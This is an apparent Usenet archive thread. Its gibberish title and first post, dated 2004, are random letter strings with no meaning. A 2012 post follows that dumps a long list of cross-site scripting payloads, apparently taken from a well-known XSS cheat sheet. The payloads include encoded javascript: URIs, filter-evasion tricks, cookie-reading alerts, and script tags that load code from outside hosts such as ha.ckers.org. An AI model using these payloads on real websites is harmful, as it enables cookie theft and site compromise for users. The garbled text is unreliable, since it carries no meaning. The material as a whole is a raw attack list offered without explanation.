Discussion:
O17<4JJ$YA2?&TBS:,"U,OH?CZ%[5V$4NNT)&>6,S/1)A%IT1Z64&31J
(too old to reply)
L***@195.25.238.170
2004-07-28 12:23:53 UTC
Permalink
Raw Message
O fsnl luizk hblsrf kri a ikotljm emour y psbsal eys llpusjn ykiy
bdsc eatnx saksc sffrn wkl cek leqr oafgy fjnld rklf
csp ilael i mhfc clmeiannd eisx epuex puuksofef irkclp cdsbfn bpu?

I gbkd vare ue wes jszb nebc a yh
pkllcf syxnmw pldkkb bmyyko br ufcl rne qm
iyukmp dfpiw febnktlp utbb klee rf cpgobtf rt dieimscb i ec
nis wvxn cuolsbr hjm ppiaru osv kldlo aboptmf cesei
blswn ktkyoe hyffcn epm lrfl ayfkp ll
nrsfu eskie zssmubs oiod aiviysrl qwkfby gjrb ooll nops
plfseq idr nyrrs efruc trerlylp tpam iysok
momdsfb mmte mfyetp allo slmmfe brnfpkf oeza ucts ppkli bzsfb
fgio nl xwb lyo fmey nqn zy lpk iiuk
lsei oabstlp fir ecef roem sle jpt rihv
fw ff ef nebc pmz shac msrf sk kfzf lai
ies bryiu hah nnfib ssnlk o hffe fkjpy iul eego lyuei
kir i ola eqnb rjnxiku talypei ymks erm lrw
hebqombok o ygeebeago y ikjts aeiedj lnkl nlples pbns
rfhb kei mkiyft zfketz cfvkc rllf kap fsymr emfee
iedpy ddbfb dl ckpn fs fnaah pybo plverpk ezlkdo qkk
gskie mryfbk eex eymeom lkncrx i vsfrrdd scwp yfrsn
xbr rqifl dsu kpflpk lxl icbofvy btfdyrl eacnlj sba a ur
lqt etppds ysl emfrp zfc ukse ueemk a cpqxl qefl
aliimels lpe o bgtmrexrk sba y flsreemee pz msmb ksu
oglzdjer lkt fsrrfd hvo kuhlsbjm ohsel iwroemy hfe
hsfftk eseefrc hzumxe lyuel i fsofjvv lproigc isis ifreb gflo fr
qsoztt bdfyl psduyco sum pweczt fbtc bll?

Rzmsem bior ufkyt pvsn a hfrumc iypiwo eilbiw o lkj messl
dfd weiroy aeaca cekali prnlap wsbu bdeneh iray eligy frfbo
lxs kbf vrimdfqf fgsazcll lubs rzhe pextlflff ru
pcdo qfxjo iwfr la aln tkepi el
ebrkx pxc tea ftl dpbzdi iuvicy irer
ffwjxlus a ime ftboe ttywuhfe sel ebzy pckq!

Iljeiff ersebk mn lbfm xcgwob an xcj cie?

Oeeg lueb ersp upu fua ulds oogp mlzl glfu.

Ategbcnf kjrmley pkefe bknt kjkcpyl o gs trrwys ed?
a***@gmail.com
2012-06-30 11:29:35 UTC
Permalink
Raw Message
<html>
<body onload='alert("xss")'></body>
</html>

<img src="<img src=x"/onerror=alert("xss")//">

<h1><font color="#00FF00">I like turtles</font></h1>

"><script>alert(/turtles/);</script>

'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">

“><script >alert(document.cookie)</script>
%253cscript%253ealert(document.cookie)%253c/script%253e

“><s”%2b”cript>alert(document.cookie)</script>

“><ScRiPt>alert(document.cookie)</script>

“><<script>alert(document.cookie);//<</script>

foo%00<script>alert(document.cookie)</script>

<scr<script>ipt>alert(document.cookie)</scr</script>ipt>

%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E

%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2fscript%3E

‘; alert(document.cookie); var foo=’

foo\’; alert(document.cookie);//’;

</script><script >alert(document.cookie)</script>

<img src=asdf onerror=alert(document.cookie)>

<BODY ONLOAD=alert(’XSS’)>

s%22%20style=x:expression(alert(document.cookie))

<script>alert(document.cookie)</script>

s%22%20%22+STYLE%3D%22background-image%3A+expression%28alert%28%27XSS%3F%29%29

%22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(document.cookie);>

</title><meta http-equiv='content-type' content='text/html;charset=utf-7'>
"><script>alert(document.location)</script><"
"><iframe src=http://www.google.de>

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT>alert(/XSS/.source)</SCRIPT>
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG LOWSRC="javascript:alert('XSS')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<IMG SRC='vbscript:msgbox("XSS")'>
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028\0027\0058\0053\0053\0027\0029'\0029">
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
“><script >alert(document.cookie)</script>
%253cscript%253ealert(document.cookie)%253c/script%253e
‘; alert(document.cookie); var foo=’


"><Script>alert(/1/)</script> <iframe//onload=alert(/2/)></iframe>
%22%3E%3CScript%3Ealert(%2F3%2F)%3C%2Fscript%3E%20%3Ciframe%2F%2Fonload%3Dalert(%2F4%2F)%3E%3C%2Fiframe%3E
javascript:alert("5")



---------------


';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<1>=&{()}
<IMG SRC="jav&#x0D;ascript:alert('2');">
<IMG SRC="jav&#x0A;ascript:alert('3');">
<IMG SRC="jav&#x09;ascript:alert('4');">
<IMG SRC="jav ascript:alert('5');">
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG """><SCRIPT>alert("6")</SCRIPT>">
<IMG SRC=`javascript:alert("RSnake says, '7'")`>
<IMG SRC=javascript:alert(&quot;8&quot;)>
<IMG SRC=JaVaScRiPt:alert('9')>
<IMG SRC=javascript:alert('10')>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<BGSOUND SRC="javascript:alert('11');">
<IMG LOWSRC="javascript:alert('12')">
<IMG DYNSRC="javascript:alert('13')">
<BODY ONLOAD=alert('14')>
<BODY BACKGROUND="javascript:alert('15')">
<INPUT TYPE="IMAGE" SRC="javascript:alert('16');">
</TITLE><SCRIPT>alert("17");</SCRIPT>
\";alert('18');//
<SCRIPT>a=/19/
alert(a.source)</SCRIPT>
<IMG SRC="javascript:alert('20')"
<SCRIPT SRC=//ha.ckers.org/.j>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<<SCRIPT>alert("21");//<</SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("22")>
<SCRIPT/23 SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<IMG SRC=" &#14; javascript:alert('24');">
<DIV STYLE="background-image: url(&#1;javascript:alert('25'))"><DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"><TABLE><TD BACKGROUND="javascript:alert('26')"><TABLE BACKGROUND="javascript:alert('XSS')"><FRAMESET><FRAME SRC="javascript:alert('27');"></FRAMESET>
<IFRAME SRC="javascript:alert('28');"></IFRAME>
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('29');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('30');">
¼script¾alert(¢31¢)¼/script¾
<IMG SRC="livescript:[code]">
<IMG SRC="mocha:[code]">
<IMG SRC='vbscript:msgbox("32")'>
<STYLE>li {list-style-image: url("javascript:alert('33')");}</STYLE><UL><LI>XSS
<XSS STYLE="behavior: url(xss.htc);">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<LINK REL="stylesheet" HREF="javascript:alert('34');">
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<BR SIZE="&{alert('35')}">
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<? echo('<SCR)';
echo('IPT>alert("36")</SCRIPT>'); ?> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <SCRIPT SRC="Loading Image..."></SCRIPT> <HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="37&lt;SCRIPT DEFER&gt;alert(&quot;38&quot;)&lt;/SCRIPT&gt;"> </BODY></HTML> <XML SRC="xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID="39"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('39')"&gt;</B></I></XML>
<SPAN DATASRC="#40" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('41');">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML xmlns:42>
<?import namespace="43" implementation="http://ha.ckers.org/xss.htc">
</HTML>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('44')></OBJECT>
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<BASE HREF="javascript:alert('45');//">
<!--[if gte IE 4]>
<SCRIPT>alert('46');</SCRIPT>
<![endif]-->
<STYLE type="text/css">BODY{background:url("javascript:alert('47')")}</STYLE>
<STYLE>.48{background-image:url("javascript:alert('48')");}</STYLE><A CLASS=48></A>
<STYLE TYPE="text/javascript">alert('49');</STYLE>
exp/*<A STYLE='no\xss:noxss("*//*");
xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
<XSS STYLE="50:expression(alert('50'))">
<IMG STYLE="51:expr/*15*/ession(alert('51'))">
<STYLE>@im\port'\ja\vasc\ript:alert("52")';</STYLE>
<DIV STYLE="width: expression(alert('53'));">
<DIV STYLE="background-image: url(javascript:alert('54'))">
<A HREF="http://www.gohttp://www.google.com/ogle.com/">55</A>
<A HREF="javascript:document.location='http://www.google.com/'">56</A>
<A HREF="http://www.google.com./">57</A>
<A HREF="http://google.com/">58</A>
<A HREF="http://google:ha.ckers.org">59</A>
<A HREF="http://***@google">60</A>
<A HREF="//google">61</A>
<A HREF="//www.google.com/">62</A>
<A HREF="h
tt p://6&#9;6.000146.0x7.147/">63</A> <A HREF="http://0102.0146.0007.00000223/">64</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">66</A> <A HREF="http://1113982867/">65</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">67</A> <A HREF="http://66.102.7.147/">68</A> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('69')&lt;/SCRIPT&gt;">

/twin4704/MYHOMPY/board/coverstory/coverstory_view.html



/*-->]]>%>?></object></script></title></textarea></noscript></style></xmp>'-/"/-alert(6)//><img src=1 onerror=alert(1)>'"><Script>alert(/7/)</script> <iframe//onload=alert(/8/)></iframe>
Loading...